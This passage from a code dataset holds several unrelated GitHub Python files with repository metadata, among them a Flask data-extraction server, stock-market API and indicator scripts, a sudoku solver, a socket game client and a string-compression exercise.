s3c_main.download_files_in_prefix_to_dir(project_prefix + '/input/kpi_mapping', config.KPI_FOLDER)\n s3c_interim.download_files_in_prefix_to_dir(project_prefix + '/interim/ml/extraction', config.EXTRACTION_FOLDER)\n s3c_main.download_files_in_prefix_to_dir(project_prefix + '/input/annotations',\n config.ANNOTATION_FOLDER)\n\n shutil.copyfile(os.path.join(config.KPI_FOLDER, \"kpi_mapping.csv\"), \"/app/code/kpi_mapping.csv\")\n\n config.STAGE = 'curate'\n config.TextCurator_kwargs['retrieve_paragraph'] = curation_settings['retrieve_paragraph']\n config.TextCurator_kwargs['neg_pos_ratio'] = curation_settings['neg_pos_ratio']\n config.TextCurator_kwargs['columns_to_read'] = curation_settings['columns_to_read']\n config.TextCurator_kwargs['company_to_exclude'] = curation_settings['company_to_exclude']\n config.TextCurator_kwargs['min_length_neg_sample'] = curation_settings['min_length_neg_sample']\n config.SEED = curation_settings['seed']\n\n try:\n if len(config.CURATORS) != 0:\n cur = Curator(config.CURATORS)\n cur.run(config.EXTRACTION_FOLDER, config.ANNOTATION_FOLDER, config.CURATION_FOLDER)\n except Exception as e:\n msg = \"Error during curation\\nException:\" + str(repr(e)) + traceback.format_exc()\n return Response(msg, status=500)\n \n if s3_usage:\n s3c_interim.upload_files_in_dir_to_prefix(config.CURATION_FOLDER, \n project_prefix + '/interim/ml/curation')\n # clear folder\n create_directory(config.KPI_FOLDER)\n create_directory(config.EXTRACTION_FOLDER)\n create_directory(config.ANNOTATION_FOLDER)\n create_directory(config.CURATION_FOLDER)\n \n return Response(\"Curation OK\", status=200)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='inference server')\n # Add the arguments\n parser.add_argument('--port',\n type=int,\n default=4000,\n help='port to use for the extract server')\n args_server = parser.parse_args()\n port = args_server.port\n app.run(host=\"0.0.0.0\", port=port)\n","repo_name":"os-climate/corporate_data_extraction","sub_path":"data_extractor/code/esg_data_pipeline/esg_data_pipeline/extraction_server.py","file_name":"extraction_server.py","file_ext":"py","file_size_in_byte":9614,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"27870905371","text":"from name_yalsooni.crawler_py.ebest.xaquery.assistant.abstract import DBResponseAssistant, Assistant, ResponseAssistant\nfrom name_yalsooni.crawler_py.ebest.xaquery.command.abstract import CM\nfrom name_yalsooni.crawler_py.ebest.xaquery.command.t1717 import T1717Command\nfrom name_yalsooni.crawler_py.ebest.util import Log\n\n\nclass T1717Assistant(Assistant):\n\n def __init__(self):\n super(T1717Assistant, self).__init__(T1717Command.TR_NAME, 3)\n self._response_dict[CM.RES_TYPE_DB] = T1717DBInsert()\n self._response_dict[CM.RES_TYPE_SOCKET] = T1717Socket()\n\n def request_process(self, command):\n Log.write(command.get_tr_name() + \" - \" + command.get_hname() + \" Request\")\n self.tr.SetFieldData(\"t1717InBlock\", \"shcode\", 0, command.get_shcode())\n self.tr.SetFieldData(\"t1717InBlock\", \"gubun\", 0, \"0\")\n self.tr.SetFieldData(\"t1717InBlock\", \"fromdt\", 0, command.get_max_date())\n self.tr.SetFieldData(\"t1717InBlock\", \"todt\", 0, command.get_today())\n self.tr.Request(0)\n return True\n\n\nclass T1717DBInsert(DBResponseAssistant):\n\n T1717_INSERT = \"INSERT INTO COL_EB_T1717 ( REQDT, SHCODE, DATE, CLOSE, SIGN, CHANGE_, DIFF, VOLUME, TJJ0000_VOL, TJJ0001_VOL, TJJ0002_VOL, TJJ0003_VOL, TJJ0004_VOL, TJJ0005_VOL, TJJ0006_VOL, TJJ0007_VOL, TJJ0008_VOL, TJJ0009_VOL, TJJ0010_VOL, TJJ0011_VOL, TJJ0018_VOL, TJJ0016_VOL, TJJ0017_VOL, TJJ0000_DAN, TJJ0001_DAN, TJJ0002_DAN, TJJ0003_DAN, TJJ0004_DAN, TJJ0005_DAN, TJJ0006_DAN, TJJ0007_DAN, TJJ0008_DAN, TJJ0009_DAN, TJJ0010_DAN, TJJ0011_DAN, TJJ0018_DAN, TJJ0016_DAN, TJJ0017_DAN) VALUES ( %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s )\"\n\n def db_response_process(self, command, tr, request_date, curs):\n \n result_count = tr.GetBlockCount(\"t1717OutBlock\")\n for i in range(0, result_count):\n try:\n curs.execute(self.T1717_INSERT, (\n command.get_request_date(),\n command.get_shcode(),\n tr.GetFieldData(\"t1717OutBlock\", \"date\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"close\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"sign\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"change\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"diff\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"volume\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0000_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0001_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0002_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0003_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0004_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0005_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0006_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0007_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0008_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0009_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0010_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0011_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0018_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0016_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0017_vol\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0000_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0001_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0002_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0003_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0004_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0005_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0006_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0007_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0008_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0009_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0010_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0011_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0018_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0016_dan\", i),\n tr.GetFieldData(\"t1717OutBlock\", \"tjj0017_dan\", i)\n )\n )\n except Exception as ex:\n Log.write(str(ex))\n continue\n\n\nclass T1717Socket(ResponseAssistant):\n\n def response_process(self, command, tr):\n pass\n","repo_name":"malchooni/EBestAPI_Python","sub_path":"name_yalsooni/crawler_py/ebest/xaquery/assistant/t1717.py","file_name":"t1717.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"35467511096","text":"from pathlib import Path\nimport pickle\nfrom PIL import Image\nimport numpy as np\n\ndef create_datafile():\n image_index = []\n labels = []\n pathlist = Path('./cell_images').glob('**/*.png')\n for path in pathlist:\n image_index.append(str(path))\n if 'Parasitized' in str(path):\n labels.append(1)\n else:\n labels.append(0)\n with open('data.pickle', 'wb') as datafile: \n pickle.dump(image_index, datafile)\n pickle.dump(labels, datafile)\n\nif __name__ == '__main__':\n create_datafile()\n","repo_name":"Beondel/Malaria-CNN","sub_path":"datawrangler.py","file_name":"datawrangler.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17503002294","text":"# My turn\ndef solution(s):\n answer = []\n\n if len(s) == 1: # 문자열 하나 입력되면 1 리턴\n return(1)\n \n s_list = list(s) # 리스트로 만들기\n \n # 1~문자열 길이만큼(절반 이상 나눠봤자 같은 쌍이 없음)\n for k in range(1,len(s)//2+1): \n cnt = 1 # 다음 문자와 같을 때 증가할 변수\n arr=[] # 2개 이상 문자열을 나눌때 그 쌍을 담을 배열\n string = '' # 최종 압축 문자열(누적해서 결과까지)\n\n if k == 1: # k==1 (문자열 하나씩만 비교)\n for i in range(len(s_list)-1): # 이전 원소까지\n if s_list[i] == s_list[i+1]: # 현재 문자가 다음 문자와 같으면\n cnt += 1 # cnt 증가\n else: # 현재 문자가 다음 문자와 다를때\n if cnt != 1: # cnt가 세어졌다면\n string += str(cnt) + s_list[i] # cnt와 현재 문자를 합친 문자열을 누적\n cnt = 1 # cnt 초기화\n else: # cnt가 안 세어졌다면\n string += s_list[i] # 현재 문자 그대로 문자열 누적\n\n if i == len(s_list)-2: # 마지막 이전 문자\n if cnt == 1: # cnt가 세어지지 않았다면\n string += s_list[i+1] # 맨 마지막 문자 누적\n else: # cnt가 세어져다면\n string += str(cnt) + s_list[i] # cnt와 마지막 이전 문자 출력\n answer.append(len(string)) # 해당 문자열의 길이를 정답 배열에 추가\n else: # k != 1\n for i in range(len(s_list)): # 마지막 원소까지\n if i == 0: # 첫번째 문자면\n string += s_list[i] # 문자 누적\n continue\n \n if i % k == 0: # 만약 현재 인덱스가 k로 나눠떨어지면\n arr.append(string) # 이전까지 누적되었던 문자를 arr 배열에 추가\n string = '' # 문자 초기화\n string += s_list[i] # 현재문자 다시 string에 기록\n else: # 그렇지 않으면(k로 안나눠지면)\n string += s_list[i] # 현재 문자 누적\n\n if i == len(s_list)-1 and len(s_list) % i != 0: # 맨 마지막 원소 그리고 나머지 문자가 있을때\n arr.append(string) # 누적된 문자를 arr 배열 추가\n\n \n test = '' # 최종 압축 문자열\n for i in range(len(arr)-1): # 마지막 이전까지\n if arr[i] == arr[i+1]:# 현재 문자가 다음 문자와 같으면\n cnt += 1 # cnt 증가\n else:# 현재 문자가 다음 문자와 다를때\n if cnt != 1:# cnt가 세어졌다면\n test += str(cnt) + arr[i]# cnt와 현재 문자를 합친 문자열을 누적\n cnt = 1# cnt 초기화\n else:# cnt가 안 세어졌다면\n test += arr[i] # 현재 문자 그대로 문자열 누적\n \n if i == len(arr)-2:# 마지막 이전 문자\n if cnt == 1:# cnt가 세어지지 않았다면\n test += arr[i+1]# 맨 마지막 문자 누적\n else: # cnt가 세어져다면\n test += str(cnt) + arr[i]# cnt와 마지막 이전 문자 출력\n answer.append(len(test))# 해당 문자열의 길이를 정답 배열에 추가\n\n return min(answer)\n\nprint(solution(\"acacacacacacbacacacacacac\"))\n\n# Good explanation\ndef compress(text, tok_len):\n # 토큰만큼 나눠 문자열 분리 저장\n words = [text[i:i+tok_len] for i in range(0, len(text), tok_len)]\n res = [] # 현재 단어와, cnt 저장할 배열\n cur_word = words[0] # 현제 딘어: 0번째 \n cur_cnt = 1 # 현재 cnt = 1\n for a, b in zip(words, words[1:] + ['']): # zip을 사용하여 현재원소와 다음원소 비교\n if a == b: # 같으면 \n cur_cnt += 1 # cnt 증가\n else: # 다르면\n res.append([cur_word, cur_cnt]) # 현재 저장된 단어와 현재 저장된 cnt 추가\n cur_word = b # 현재 단어를 갱신\n cur_cnt = 1 # cnt 1로 갱신\n # 갯수가 한개인건 그대로 계산 , 2이상 cnt가 있는 문자와 그 카운트 숫자(1카운트)의 합\n return sum(len(word) + (len(str(cnt)) if cnt > 1 else 0) for word, cnt in res)\n\ndef solution(text): \n # 1~문자열 길이 절반만큼의 토큰을 부여하고 이들중 최소 문자열 길이 출력\n return min(compress(text, tok_len) for tok_len in list(range(1, int(len(text)/2) + 1)) + [len(text)])\n\na = [\n \"aabbaccc\",\n \"ababcdcdababcdcd\",\n \"abcabcdede\",\n \"abcabcabcabcdededededede\",\n \"xababcdcdababcdcd\",\n\n 'aaaaaa',\n]\n\nfor x in a:\n print(solution(x))","repo_name":"leesh125/Programmers_coding_test","sub_path":"lv2/Python3/ZipString.py","file_name":"ZipString.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7193160413","text":"import csv\nimport ntpath\n\n\nclass CsvRecordOfPopulation:\n\n def __init__(self, file_name):\n self._file_name = ntpath.basename(file_name)\n\n self._person_file = open(file_name + '_persons.csv', 'w', encoding='utf8')\n self._source_text_file = open(file_name + '_source_texts.csv', 'w', encoding='utf8')\n\n self._person_field_names = ['kairaId', 'firstNames', 'lastNames', 'formerSurname', 'sourceTextId']\n self._source_text_field_names = ['sourceTextId', 'sourceText']\n\n self._person_writer = csv.DictWriter(self._person_file, fieldnames=self._person_field_names)\n self._person_writer.writeheader()\n\n self._source_text_writer = csv.DictWriter(self._source_text_file, fieldnames=self._source_text_field_names)\n self._source_text_writer.writeheader()\n self._source_texts = {}\n\n self._source_text_id_counter = 0\n\n def _get_source_text_id(self):\n self._source_text_id_counter += 1\n return self._file_name + '_' + str(self._source_text_id_counter)\n\n def _add_source_text(self, text):\n if text in self._source_texts:\n return self._source_texts[text]\n else:\n text_id = self._get_source_text_id()\n self._source_texts[text] = text_id\n\n return text_id\n\n def add_primary_person(self, data_entry):\n source_text_id = self._add_source_text(data_entry['personMetadata']['sourceText'])\n\n self._person_writer.writerow({'kairaId': data_entry['primaryPerson']['kairaId'],\n 'firstNames': data_entry['primaryPerson']['name']['firstNames'],\n 'lastNames': data_entry['primaryPerson']['name']['surname'],\n 'formerSurname': data_entry['primaryPerson']['formerSurname'],\n 'sourceTextId': source_text_id})\n\n return source_text_id\n\n def add_child(self, data_entry, child):\n source_text_id = self._add_source_text(data_entry['personMetadata']['sourceText'])\n\n self._person_writer.writerow({'kairaId': child['kairaId'],\n 'firstNames': child['name'],\n 'lastNames': data_entry['primaryPerson']['name']['surname'],\n 'formerSurname': None,\n 'sourceTextId': source_text_id})\n\n return source_text_id\n\n def add_spouse(self, data_entry, spouse):\n source_text_id = self._add_source_text(data_entry['personMetadata']['sourceText'])\n\n self._person_writer.writerow({'kairaId': spouse['kairaId'],\n 'firstNames': spouse['firstNames'],\n 'lastNames': data_entry['primaryPerson']['name']['surname'],\n 'formerSurname': spouse['formerSurname'],\n 'sourceTextId': source_text_id})\n\n return source_text_id\n\n def save_to_file(self):\n self._source_texts = sorted([{'sourceTextId': text_id, 'sourceText': text} for text, text_id in self._source_texts.items()], key=lambda x: x['sourceTextId'])\n self._source_text_writer.writerows(self._source_texts)\n\n self._person_file.close()\n self._source_text_file.close()\n","repo_name":"Learning-from-our-past/karelian-db","sub_path":"db_management/csv_record.py","file_name":"csv_record.py","file_ext":"py","file_size_in_byte":3271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35166214799","text":"data = []\nx = 0\nwhile True:\n user = input(\"Masukkan Angka : \")\n if user == 'n':\n break\n x += 1\n data.append(user)\n\nRatarata = 0\nfor nilai in data:\n Ratarata += int(nilai)\nRatarata /= x\nprint(Ratarata)\n","repo_name":"ShaneJohanes20/UAS-Pemrograman","sub_path":"UAS Pemrograman/soalNomor3.py","file_name":"soalNomor3.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2885464291","text":"#!/usr/bin/env python3\n\nimport socket, sys\nfrom constants import *\n\n# define host and port\nif len(sys.argv) != 3:\n print(\"Usage : python3 client.py \")\n exit()\nelse:\n host = sys.argv[1]\n port = int(sys.argv[2])\n\n# create socket\ntry:\n sc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sc.setsockopt(socket.SOL_SOCKET , socket.SO_REUSEADDR , 1)\nexcept socket.error as msg:\n print(\"Erreur de création de la socket : \" + str(msg))\n exit()\n# connect to server\ntry:\n sc.connect((host, port))\nexcept socket.error as msg:\n print(\"Erreur de connexion : \" + str(msg))\n exit()\n\nwhile True:\n \"\"\" Receive the message from the server \"\"\"\n # receive action from server\n action = sc.recv(1)\n # if action is empty, the server has closed the connection\n if action == b\"\":\n break\n # parse action to int and execute the corresponding action\n action = int(action.decode())\n\n if action == SHOW_GRID:\n grid = sc.recv(98).decode()\n print(grid)\n elif action == NEW_PLAYER:\n print(\"Nouveau joueur connecté\")\n elif action == GET_CLIENT_SHOT:\n sc.send(input(\"Quelle case voulez-vous jouer ?\").encode(\"utf-8\"))\n elif action == WINNER:\n print(\"Vous avez gagné !\")\n elif action == LOOSER:\n print(\"Vous avez perdu !\")\n elif action == SCORE:\n score = sc.recv(22).decode()\n print(score)\n elif action == REPLAY:\n sc.send(input(\"Voulez-vous rejouer ? (Y / N)\\n\").encode(\"utf-8\"))\n\n# close socket\nprint(\"Close\")\nsc.close()\n","repo_name":"NCombarieu/Morpion","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1315381297","text":"from file_manager import * # idea: usare griglia delle entropie?\r\n\r\nSIZE = 9 # solo 9x9\r\n\r\n\r\ndef initialize_grid():\r\n grid = [[None for _ in range(SIZE)] for _ in range(SIZE)]\r\n for i in range(SIZE):\r\n for j in range(SIZE):\r\n grid[i][j] = [1 if i != SIZE else -1 for i in range(SIZE + 1)]\r\n return grid\r\n\r\n\r\ndef compile_grid(grid, data):\r\n for index, number in enumerate(data):\r\n if number != 0:\r\n for i in range(SIZE):\r\n grid[index // SIZE][index % SIZE][i] = int(i == number - 1)\r\n grid[index // SIZE][index % SIZE][-1] = number - 1\r\n decrease_entropy(grid, index % SIZE, index // SIZE)\r\n\r\n\r\ndef available(x, y):\r\n return 0 <= x < SIZE and 0 <= y < SIZE\r\n\r\n\r\ndef decrease_entropy(grid, x, y): # chiamata quando viene compiuta una mossa\r\n v = grid[y][x][-1]\r\n\r\n for i in range(SIZE):\r\n if available(x, i) and grid[i][x][-1] == -1: # colonna\r\n grid[i][x][v] = 0\r\n if available(i, y) and grid[y][i][-1] == -1: # riga\r\n grid[y][i][v] = 0\r\n if grid[(y // 3) * 3 + i // 3][(x // 3) * 3 + i % 3][-1] == -1: # quadrato\r\n grid[(y // 3) * 3 + i // 3][(x // 3) * 3 + i % 3][v] = 0\r\n\r\n\r\ndef collapse(grid, x, y, v):\r\n grid[y][x][-1] = v\r\n grid[y][x][v] = 0\r\n\r\n\r\ndef stack_add(stack, grid, x, y): # dovrebbe funzionare...\r\n copy = [[None for _ in range(SIZE)] for _ in range(SIZE)]\r\n \r\n for i in range(SIZE):\r\n for j in range(SIZE):\r\n copy[i][j] = [k for k in grid[i][j]]\r\n copy[y][x][-1] = -1\r\n stack.append(copy)\r\n\r\n\r\ndef find_collapse(grid, stack):\r\n x, y, v, e = None, None, None, SIZE + 1\r\n flag = False\r\n status = None # 0 avanti, 1 completo, 2 contraddizione\r\n\r\n for i in range(SIZE):\r\n for j in range(SIZE):\r\n if grid[i][j][-1] == -1:\r\n current = sum(grid[i][j][:-1])\r\n\r\n if current < e and current != 0: # randomizzare?\r\n e = current\r\n y, x = i, j\r\n candidates = [n for n, k in enumerate(grid[i][j][:-1]) if k]\r\n v = candidates[0]\r\n\r\n if current == 1:\r\n flag = True\r\n break\r\n\r\n elif current == 0:\r\n return i, j, 2\r\n\r\n if flag:\r\n break\r\n\r\n if x is None or y is None or v is None: # tutte condizioni equivalenti...\r\n return x, y, 1\r\n\r\n collapse(grid, x, y, v) # compi la scelta\r\n\r\n if not flag: # scelta arbitraria\r\n status = 0\r\n stack_add(stack, grid, x, y)\r\n\r\n return x, y, status\r\n\r\n\r\n\r\ndef solve(input_file):\r\n data = obtain_grid(input_file)\r\n grid = initialize_grid()\r\n compile_grid(grid, data)\r\n\r\n stack = []\r\n\r\n while True:\r\n\r\n x, y, s = find_collapse(grid, stack)\r\n\r\n if s == 2:\r\n grid = stack.pop(-1)\r\n elif s != 1:\r\n decrease_entropy(grid, x, y)\r\n else:\r\n break\r\n\r\n\r\n print(\"done\")\r\n write_output(\"output.txt\", grid)\r\n\r\n\r\nsolve(\"input.txt\")\r\n","repo_name":"Sierpinski22/Python-Projects","sub_path":"sudoku solver/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20131406679","text":"import unittest\n\nimport zope.interface.verify\n\nfrom mk import interfaces\nfrom mk import resources\n\n\nclass RootResourceTestCase(unittest.TestCase):\n def test_base_resource_sets_request_on_self(self):\n request = {}\n resource = resources.BaseResource(request)\n self.assertIs(resource.request, request)\n\n def test_root_resource_implements_root_endpoint(self):\n zope.interface.verify.verifyClass(\n interfaces.IRootEndpoint,\n resources.RootResource,\n )\n","repo_name":"monokrome/monokro.me","sub_path":"mk/resources_spec.py","file_name":"resources_spec.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70635293548","text":"n1 = int(input(\"Qual o primeiro número? \"))\nn2 = int(input(\"Qual o segundo número? \"))\ns = n1 + n2\nm = n1 * n2\nd = n1 / n2\ndi = n1 // n2\ne = n1 ** n2\nr = n1 % n2\n# para formatar 3 números após a vírgula (:.3f)\n# Para não pular a linha e/ou adicional algo no final (end = ' ') e para adicionar outra linha (\\n)\nprint(\"A soma é {},\\nO produto é: {} e a divisão é: {:.3f}\".format(s, m, d), end=\" \")\nprint(\"A divisão inteira é: {}, a potência é: {} e o resto é: {}\".format(di, e, r))\n","repo_name":"GigioFu/PycharmProjects","sub_path":"Curso_em_Video/Exercícios de AulaM1/operadoes_aritmedicos.py","file_name":"operadoes_aritmedicos.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16474889837","text":"from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\nclass Task(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE, verbose_name=\"Created By\")\n title = models.CharField(max_length=100, verbose_name=\"Title\")\n completed = models.BooleanField(default=False, verbose_name=\"Completed\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.title","repo_name":"asyraphile/todolist","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6162530052","text":"from typing import List\n\nfrom src.repositories.telegram_chat_ids_repository.base import TelegramChatIdsRepositoryABC\n\n\nclass TelegramChatIdsRepositoryLocal(TelegramChatIdsRepositoryABC):\n _filename: str\n\n def __init__(self, filename: str):\n self._filename = filename\n\n async def get_all_chats(self) -> List[str]:\n with open(self._filename, \"r\") as f:\n line = f.readline()\n return line.split(\",\")\n\n async def add_chat(self, chat_id: str):\n with open(self._filename, \"a\") as f:\n f.write(f\"{chat_id},\")\n\n async def remove_chat(self, chat_id: str):\n chats = await self.get_all_chats()\n filtered = filter(lambda id_: id_ != chat_id, chats)\n self.set_chats(list(filtered))\n\n def set_chats(self, chat_ids: List[str]):\n with open(self._filename, \"w\") as f:\n f.write(\",\".join(chat_ids))\n\n async def is_chat_id_subscribed(self, chat_id: str) -> bool:\n with open(self._filename, \"r\") as f:\n ids = f.readline().split(\",\")\n return chat_id in ids\n","repo_name":"vdor/tgn-water-bot","sub_path":"src/repositories/telegram_chat_ids_repository/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74166072427","text":"import baostock as bs\nimport pandas as pd\nimport talib as ta\nimport datetime\nimport numpy as np\nfrom stock_pandas import StockDataFrame\n\n\ncode = 'sz.002241'\nstart_date = '2000-01-01'\nend_date = '2022-03-25'\n\n# global_dateday = None\nglobal_dateday = '2022-04-07'\nlg = bs.login()\n\nparams = []\nkdj_params = '9,3,3'\nwith open('input_params.txt', 'r') as f:\n code_list = f.readlines()\n for index, item in enumerate(code_list):\n item = item.strip()\n if index == 2:\n kdj_params = item\n item = item.split(',')\n \n params += [int(i) for i in item]\n\n print(params)\n\ndef get_data(code, end_date, start_date='2000-01-01'):\n #Step1: 获取数据\n print(code)\n rs = bs.query_history_k_data_plus(code,\n \"date,code,open,high,low,close,preclose,volume,amount,turn\",\n start_date=start_date, end_date=end_date, frequency=\"d\", adjustflag='2')#注意adjustflag取前复权\n data_list = []\n while (rs.error_code == '0') & rs.next():\n data_list.append(rs.get_row_data())\n df = pd.DataFrame(data_list, columns=rs.fields)\n df[['open', 'high', 'low', 'close', 'volume']] = df[['open', 'high', 'low', 'close', 'volume']].astype(\n 'float64')\n df = df.rename(columns={'date': 'datetime'})\n df.index = pd.DatetimeIndex(df['datetime'])\n # bs.logout()\n import time\n time_start=time.time()\n \n #Step2: 利用Pandas 计算MACD\n \n short_ema = df['close'].ewm(span=params[0]).mean()\n long_ema = df['close'].ewm(span=params[1]).mean()\n df.loc[:, 'DIFF'] = short_ema - long_ema\n df.loc[:, 'DEA'] = df['DIFF'].ewm(span=params[2]).mean()\n df.loc[:, 'MACD'] = 2 * (df['DIFF'] - df['DEA'])\n df[\"rsi_6\"] = ta.RSI(df['close'], timeperiod=params[3])\n df[\"rsi_12\"] = ta.RSI(df['close'], timeperiod=params[4])\n df[\"rsi_24\"] = ta.RSI(df['close'], timeperiod=params[5])\n\n # low_list = df['low'].rolling(9, min_periods=9).min()\n # low_list.fillna(value=df['low'].expanding().min(), inplace=True)\n # high_list = df['high'].rolling(9, min_periods=9).max()\n # high_list.fillna(value = df['high'].expanding().max(), inplace=True)\n # rsv = (df['close'] - low_list) / (high_list - low_list) * 100\n # df['k'] = pd.DataFrame(rsv).ewm(com=2).mean()\n # df['d'] = df['k'].ewm(com=2).mean()\n # df['j'] = 3 * df['k'] - 2 * df['d']\n time_end=time.time()\n format = '%Y-%m-%d'\n dateday = datetime.date.today().strftime(format)\n if global_dateday:\n dateday = global_dateday\n\n stock = StockDataFrame(df)\n kdj = stock[[f'kdj.k:{kdj_params}', f'kdj.d:{kdj_params}', f'kdj.j:{kdj_params}']]\n df['k'] = kdj.loc[dateday][0]\n df['d'] = kdj.loc[dateday][1]\n df['j'] = kdj.loc[dateday][2]\n\n # import ipdb;ipdb.set_trace()\n\n df_filter = df[df['datetime']==dateday]\n # import ipdb;ipdb.set_trace()\n return deal_df(df_filter)\n\n\ndef deal_df(df):\n df_new = pd.DataFrame()\n df_new['时间'] = df['datetime']\n df_new['股票代码'] = df['code']\n df_new['当前股价'] = df['close']\n df_new['开盘股价'] = df['open']\n df_new['涨跌幅'] = (df['close'] - df['preclose'].astype(float) ) / df['preclose'].astype(float) \n df_new['收盘股价'] = df['preclose']\n df_new['最高价'] = df['high']\n df_new['最低价'] = df['low']\n df_new['成交量'] = df['volume']\n df_new['成交额'] = df['amount']\n df_new['换手(实)'] = df['turn']\n df_new['MACD'] = df['MACD']\n df_new['DIFF'] = df['DIFF']\n df_new['DEA'] = df['DEA']\n df_new['rsi_6'] = df['rsi_6']\n df_new['rsi_12'] = df['rsi_12']\n df_new['rsi_24'] = df['rsi_24']\n df_new['k'] = df['k']\n df_new['d'] = df['d']\n df_new['j'] = df['j']\n # import ipdb;ipdb.set_trace()\n return df_new\nif __name__ == '__main__':\n get_data(code, start_date, end_date)","repo_name":"maiff/stockSpider","sub_path":"zhibiao.py","file_name":"zhibiao.py","file_ext":"py","file_size_in_byte":3875,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"1749415418","text":"\"\"\"\nTest function to pull messages from pub/sub topic\n\"\"\"\n\nimport os\nimport json\nfrom google.cloud import pubsub_v1\nfrom dotenv import load_dotenv\nfrom pathlib import Path\n\ndotenv_path = Path(__file__).resolve().parents[1] / '.env'\nload_dotenv(dotenv_path=dotenv_path)\n\n\nPROJECT_ID = os.getenv(\"PROJECT_ID\")\nSUB_ID = os.getenv('BACKEND_PULL_SUBSCRIBER_ID')\n\nsubscriber = pubsub_v1.SubscriberClient()\n\nsubscriber_path = subscriber.subscription_path(PROJECT_ID, SUB_ID)\n\ndef receive():\n response = subscriber.pull(\n request={\n 'subscription': subscriber_path,\n 'max_messages': 1,\n }\n )\n\n # acknowledge reception\n msg = response.received_messages[0]\n ack_id = msg.ack_id\n subscriber.acknowledge(\n request={\n 'subscription': subscriber_path,\n 'ack_ids': [ack_id],\n }\n )\n data = json.loads(msg.message.data)\n return data\n\nif __name__ == '__main__':\n print(receive())","repo_name":"vykuang/mlops-zoomcamp","sub_path":"w4-deployment/stream/backend/receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43745531333","text":"#!/usr/bin/python3\n\n# -*- coding: utf-8 -*-\n\nfrom Prima_algorythm import *\n\n\ndef get_min(R, U):\n rm = (INF, -1, -1)\n for v in U:\n rr = min(R, key=lambda x: x[0] if (x[1] == v or x[2] == v) and (x[1] not in U or 